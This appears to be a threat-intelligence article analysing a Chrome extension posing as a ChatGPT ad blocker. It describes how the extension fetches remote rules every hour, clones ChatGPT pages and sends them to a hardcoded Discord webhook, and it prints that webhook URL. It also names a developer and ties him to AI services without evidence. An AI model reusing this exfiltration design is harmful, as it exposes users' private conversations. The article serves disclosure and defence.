Browser extensions have long been marketed as tools to enhance productivity, privacy, and browsing convenience. However, the discovery of a malicious Chrome extension named “ChatGPT Ad Blocker” highlights how easily trust can be exploited in the modern AI-driven ecosystem. What appears to be a harmless utility designed to block ads is, in reality, a sophisticated data-harvesting mechanism targeting user conversations.
This report uncovers a concerning pattern of behavior tied to a Chrome Web Store extension associated with the GitHub account krittinkalra, also linked to platforms such as AI4ChatCo and Writecream. While positioned as a solution to block ads on ChatGPT, the extension’s true purpose is far more invasive—it systematically extracts user data and transmits it to an external server without consent.
A Disguised Entry Point: The Chrome Extension
The extension, published on February 10, 2026, under the ID:
ipmmidjikiklckbngllogmggoofbhjikgb
presents itself as a simple ad-blocking tool. However, its internal behavior reveals a different intent. Upon installation, it immediately triggers a background process using chrome.runtime.onInstalled. This process fetches a remote configuration file from:
https[:]//raw.githubusercontent[.]com/krittinkalra/chatgpt-ad-blocker/main/rules.json
The extension sets up a persistent alarm using chrome.alarms.create("fetchRules", {periodInMinutes: 60}), ensuring that it re-fetches this configuration every hour. By appending a timestamp parameter (?t=${Date.now()}), it bypasses caching entirely, allowing attackers to dynamically modify the extension’s behavior without requiring updates or user interaction.
The Real Payload: Silent Data Exfiltration
While marketed as an ad blocker, the extension does not actively block ads. Instead, it injects a script (content.js) into ChatGPT pages. This script listens for commands from another component (popup.js) and initiates data extraction when triggered.
The mechanism works as follows:
- The extension sends a request:
chrome.tabs.sendMessage(tab.id, {action: "GET_SANITIZED_HTML"}) - The content script clones the entire DOM using:
document.body.cloneNode(true) - It removes scripts, styles, and images but retains textual content and structure
- It selectively redacts only text longer than 150 characters
This approach ensures that most user prompts, conversation flows, and metadata remain intact while avoiding detection by simplistic filters. The resulting HTML snapshot effectively reconstructs the user’s ChatGPT session.
Data Delivery via Discord Webhook
Once the data is collected, it is packaged and transmitted through a hardcoded Discord webhook:
https[:]//discord[.]com/api/webhooks/1470672111038103553/zkuhZvXgJ1auAbCTASubhGNF-wB2iTKVnvnp_uh3mCE8unGTTZBx49B6ZQzrEupkwr_f
The exfiltration process includes:
- Creating a Blob from the HTML data
- Attaching it as
page_dump.html - Sending it via
FormDatato Discord
Each submission appears in a Discord channel with the message:
“New Ad Report Received”
The payload includes the full page structure, user prompts, timestamps, and UI metadata—effectively exposing private conversations in a readable format.
Suspicious Developer Activity
The GitHub account associated with this extension shows unusual behavioral patterns:
- Account age: ~12 years (created ~2014)
- Previous work: Android kernel development (C/C++)
- Dormancy: Over 5 years (2020–2026)
- Sudden shift: Transition to JavaScript-based browser extensions
This abrupt pivot from low-level systems programming to web-based scripting, combined with the malicious nature of the extension, raises legitimate concerns. The same persona has publicly linked themselves to AI-driven platforms like AI4ChatCo and Writecream—services that claim to provide content generation and automation for millions of users.
Indicators of Compromise (IOCs)
The investigation identified the following domains associated with the campaign:
- blockaiads[.]com
- openadblock[.]com
- gptadblock[.]com
These domains may serve as infrastructure for distributing or supporting similar malicious tools.
Why This Attack Matters
This case is particularly alarming because it targets high-value conversational data. ChatGPT users often share sensitive information, including business ideas, personal thoughts, proprietary code, and confidential communications. By extracting structured HTML rather than raw text, the attacker preserves context, making the stolen data far more valuable.
The attack also demonstrates a broader trend: leveraging popular AI tools and policy changes—such as the introduction of ads—to socially engineer users into installing malicious software.
Security Recommendations
Users should adopt a cautious approach when installing browser extensions:
- Avoid extensions that promise to modify behavior on sensitive platforms
- Scrutinize permissions, especially access to “all websites”
- Be wary of tools linked to external or unknown developer ecosystems
- Regularly audit installed extensions and remove unused ones
Additionally, organizations should educate users about the risks of browser-based data exfiltration and enforce stricter endpoint security policies.
Our Perspective on This Incident
This case reflects a deeper issue within the modern AI and browser ecosystem: the growing intersection of convenience, trust, and exploitation. The attacker did not rely on sophisticated zero-day vulnerabilities or advanced exploits. Instead, they leveraged user psychology—offering a solution to a perceived annoyance (ads)—to gain access to highly sensitive data.
What stands out is the calculated design of the extension. From dynamic rule fetching to selective data sanitization, every component appears engineered to maximize stealth and adaptability. The use of Discord as an exfiltration channel further demonstrates how attackers are increasingly relying on legitimate platforms to mask malicious activity.
Equally concerning is the potential ecosystem risk. If the same developer is associated with widely used AI services, the question of broader data exposure becomes unavoidable. While no direct evidence confirms compromise in those platforms, the overlap in identity warrants scrutiny.
Ultimately, this incident underscores the need for stronger vetting mechanisms in browser extension marketplaces and greater awareness among users. As AI tools become more embedded in daily workflows, they will inevitably become more attractive targets. Trust, once broken in such environments, is difficult to restore—and that makes proactive security more critical than ever.
